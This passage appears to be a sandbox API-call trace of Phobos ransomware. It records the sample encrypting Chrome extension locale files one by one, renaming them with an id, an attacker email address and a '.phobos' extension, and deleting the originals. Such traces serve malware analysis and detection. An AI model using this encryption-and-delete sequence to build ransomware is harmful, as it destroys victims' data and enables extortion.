(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.361] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.361] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.361] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.361] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.361] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe0, lpOverlapped=0x0) returned 1 [0149.367] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0149.368] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0149.642] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0149.642] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.642] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.642] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.642] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.643] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.643] CloseHandle (hObject=0x148) returned 1 [0149.643] CloseHandle (hObject=0x190) returned 1 [0149.643] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json")) returned 1 [0149.644] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.644] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=207) returned 1 [0149.644] CloseHandle (hObject=0x190) returned 1 [0149.644] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json")) returned 0x2020 [0149.644] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.645] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.645] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.645] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.645] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.645] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xcf, lpOverlapped=0x0) returned 1 [0149.647] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0149.647] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0149.648] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0149.648] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.648] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.648] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.648] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.648] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.648] CloseHandle (hObject=0x190) returned 1 [0149.648] CloseHandle (hObject=0x148) returned 1 [0149.648] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json")) returned 1 [0149.649] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.651] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=217) returned 1 [0149.651] CloseHandle (hObject=0x148) returned 1 [0149.651] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json")) returned 0x2020 [0149.651] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.651] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.651] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.654] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.654] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.654] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd9, lpOverlapped=0x0) returned 1 [0149.657] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0149.657] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0149.658] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0149.658] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.658] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.658] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.658] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.658] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.658] CloseHandle (hObject=0x148) returned 1 [0149.658] CloseHandle (hObject=0x190) returned 1 [0149.658] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json")) returned 1 [0149.659] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.659] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=195) returned 1 [0149.659] CloseHandle (hObject=0x190) returned 1 [0149.660] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json")) returned 0x2020 [0149.660] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.660] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.660] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.660] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.660] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.660] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xc3, lpOverlapped=0x0) returned 1 [0149.661] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0149.661] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0149.662] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0149.662] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.662] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.662] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.662] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.662] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.662] CloseHandle (hObject=0x190) returned 1 [0149.662] CloseHandle (hObject=0x148) returned 1 [0149.662] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json")) returned 1 [0149.663] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.663] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=213) returned 1 [0149.664] CloseHandle (hObject=0x148) returned 1 [0149.664] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json")) returned 0x2020 [0149.664] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.664] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.664] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.664] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.664] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.664] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd5, lpOverlapped=0x0) returned 1 [0149.665] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0149.665] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 